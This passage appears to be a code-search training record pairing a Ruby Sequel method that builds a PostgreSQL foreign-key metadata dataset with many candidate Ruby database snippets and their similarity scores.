:oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def dataset_key\n :id\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def foreign_key\n association.foreign_key \n end",
"def dataset\n database[table_name]\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def _select_pk_ds\n @_select_pk_ds ||= metadata_dataset.\n from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).\n where{[\n [pg_class[:oid], pg_attribute[:attrelid]],\n [pg_class[:relnamespace], pg_namespace[:oid]],\n [pg_class[:oid], pg_index[:indrelid]],\n [pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],\n [pg_index[:indisprimary], 't']\n ]}.\n select{pg_attribute[:attname].as(:pk)}\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def excluded_foreign_key_names\r\n excluded_dimension_relations = prejoined_fields.keys.collect {|k| dimension_relationships[k]}\r\n excluded_dimension_relations.collect {|r| r.foreign_key}\r\n end",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def essential_columns(model_class)\n model_class.reflect_on_all_associations.inject([@primary_key]) do |arr, assoc|\n if assoc.options[:dependent] && assoc.macro == :belongs_to\n arr << assoc.association_foreign_key\n end\n arr\n end\n end",
"def index\n @foreign_keys = ForeignKey.all\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def fetch_reference_ids(table, row)\n attributes = {}\n table.reference_columns.each do |c|\n new_id = nil\n if row[c.name.to_s].is_a?(Array)\n new_id = []\n row[c.name.to_s].each do |old_id|\n new_id << no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, old_id)\n end\n else\n new_id = no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, row[c.name.to_s])\n end\n attributes.merge!(c.name => new_id) unless new_id.nil?\n end\n attributes\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def keys\n @table.keys.inject(@parent ? @parent.keys : []) do |res, k1|\n @table[k1].keys.inject(res) do |_res, k2|\n ref = make_reference(k1, k2)\n _res.include?(ref) ? _res : res << ref\n end\n end\n end",
"def stores_foreign_key?; true; end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def eager_loaded_ids(docs, metadata)\n if metadata.stores_foreign_key?\n docs.flat_map{ |doc| doc.send(metadata.foreign_key) }\n else\n docs.map(&:id)\n end\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def foreign_key_choices\n choices = []\n foreign_keys.each do |foreign_key|\n choices << foreign_key.all_from_class\n end\n choices\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def belongs_to_relations(ar_instance)\n\t\t\tcolumns = ar_instance.class.column_names\n\t\t\tparents = columns.map{ |c| c if c =~ /_id/ }.reject{ |c| c.nil? }\n\t\t\tparents.map!{ |parents| parents.gsub('_id', '') }\n\t\tend",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def related_data\n @resource.related_identifiers.where(verified: true).where(hidden: false).map do |ri|\n { relation: ri.relation_type_friendly&.camelize(:lower), identifier: ri.related_identifier }\n end || []\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def has_many_relations(ar_instance)\n\t\t\tcolumn_name = \"#{ar_instance.class.name.underscore}_id\"\n\t\t\tdescendents = ActiveRecord::Base.connection.tables\n\t\t\tdescendents.reject!{ |table| false unless table.classify.constantize rescue true }\n\t\t\tdescendents.reject!{ |table| true unless table.classify.constantize.column_names.include?(column_name) }\n\t\tend",
"def foreigns\n []\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def association_key\n table[association_key_name]\n end",
"def schema_ds_join(table_name, opts)\n [:information_schema__columns, {:table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name} , :c]\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def foreign_key_for(association)\n model_instance[association.foreign_key_column_name]\n end",
"def find_table_by_foreign_key(column_name)\n @opts[:foreign_key][:alias].values_at(column_name).first\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def association_keys\n association\n .__send__(:join_key_map, container.relations)\n end",
"def table_ref(t)\n case t\n when Dataset\n t.to_table_reference\n when Hash\n t.map {|k, v| \"#{table_ref(k)} #{table_ref(v)}\"}.join(COMMA_SEPARATOR)\n when Symbol\n symbol_to_column_ref(t)\n when String\n quote_identifier(t)\n else\n literal(t)\n end\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def preload_belongs_to(connection, records, relation, as:)\n belonging_column = relation.belonging_column.to_sym\n having_column = relation.having_column.to_sym\n\n foreign_ids = H.pluck(records, belonging_column).uniq.compact\n\n scope = connection.scope(table: relation.having_table)\n scope = scope.where(having_column => foreign_ids)\n\n recs = connection.all(scope, into: Hash)\n recs_by_id = H.by_key(recs, having_column)\n\n records.each do |model|\n model[as] = recs_by_id[model.fetch(belonging_column)]\n end\n end",
"def build_id_constraint(reflection, keys, value, table = nil, bind_param = false)\n table ||= reflection.aliased_table\n value, binds = build_binds_for_constraint(reflection, value, keys.foreign_key) \\\n if bind_param\n\n [reflection.build_id_constraint(table[keys.key], value), binds]\n end",
"def dataset_id\n return @reference.dataset_id if reference?\n @gapi_json[:modelReference][:datasetId]\n end",
"def keys\n\t\t@name_table\n\tend",
"def foreign_key?\n @ref_table ? true : false\n end",
"def table\n association.table_name\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end"
] |
[
"0.720176",
"0.68655574",
"0.6834935",
"0.6735687",
"0.6703324",
"0.6665703",
"0.651877",
"0.6441737",
"0.640113",
"0.640113",
"0.637693",
"0.63623524",
"0.6326083",
"0.6310065",
"0.6262004",
"0.6242311",
"0.61340344",
"0.6112476",
"0.60712636",
"0.60219014",
"0.60215473",
"0.599201",
"0.5970358",
"0.5956353",
"0.5926209",
"0.591749",
"0.5904487",
"0.5897674",
"0.58668226",
"0.5817491",
"0.5816471",
"0.5811237",
"0.58106625",
"0.5793118",
"0.577899",
"0.5777368",
"0.57617366",
"0.5758378",
"0.57553726",
"0.5742011",
"0.5736639",
"0.5732755",
"0.5726754",
"0.56980985",
"0.5660365",
"0.5660365",
"0.5614689",
"0.5605395",
"0.56048876",
"0.5596807",
"0.5587384",
"0.558672",
"0.55608004",
"0.554482",
"0.55411786",
"0.5538057",
"0.5532134",
"0.5513305",
"0.5493595",
"0.54873544",
"0.5482563",
"0.5480416",
"0.5472663",
"0.5472663",
"0.5469943",
"0.54662204",
"0.54609203",
"0.5460148",
"0.5439532",
"0.5435209",
"0.5423513",
"0.541812",
"0.54173946",
"0.54087603",
"0.5401885",
"0.54010266",
"0.54007673",
"0.53953546",
"0.5394593",
"0.5392467",
"0.5392299",
"0.5387156",
"0.53836817",
"0.53831345",
"0.5382937",
"0.5373587",
"0.5373587",
"0.53724176",
"0.537164",
"0.5369725",
"0.5369725",
"0.53518903",
"0.5350268",
"0.5350055",
"0.53492033",
"0.5345168",
"0.5344518",
"0.53441817",
"0.5339995",
"0.5334228"
] |
0.6119571
|
17
|
Build dataset used for foreign key list methods.
|
def __foreign_key_list_ds(reverse)
if reverse
ctable = Sequel[:att2]
cclass = Sequel[:cl2]
rtable = Sequel[:att]
rclass = Sequel[:cl]
else
ctable = Sequel[:att]
cclass = Sequel[:cl]
rtable = Sequel[:att2]
rclass = Sequel[:cl2]
end
if server_version >= 90500
cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}
rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}
# :nocov:
else
range = 0...32
cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}
rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}
# :nocov:
end
ds = metadata_dataset.
from{pg_constraint.as(:co)}.
join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).
join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).
join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).
join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).
join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).
order{[co[:conname], cpos]}.
where{{
cl[:relkind]=>%w'r p',
co[:contype]=>'f',
cpos=>rpos
}}.
select{[
co[:conname].as(:name),
ctable[:attname].as(:column),
co[:confupdtype].as(:on_update),
co[:confdeltype].as(:on_delete),
cl2[:relname].as(:table),
rtable[:attname].as(:refcolumn),
SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),
nsp[:nspname].as(:schema)
]}
if reverse
ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])
end
ds
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def build!(data_set_name)\n interface(data_set_name).create_empty_data_set\n library[data_set_name] = DataSet.new(data_set_name, interface(data_set_name))\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def dataset_key\n :id\n end",
"def _dataset(opts)\n raise(Sequel::Error, \"model object #{inspect} does not have a primary key\") if opts.dataset_need_primary_key? && !pk\n ds = if opts[:dataset].arity == 1\n instance_exec(opts, &opts[:dataset])\n else\n instance_exec(&opts[:dataset])\n end\n _apply_association_options(opts, ds)\n end",
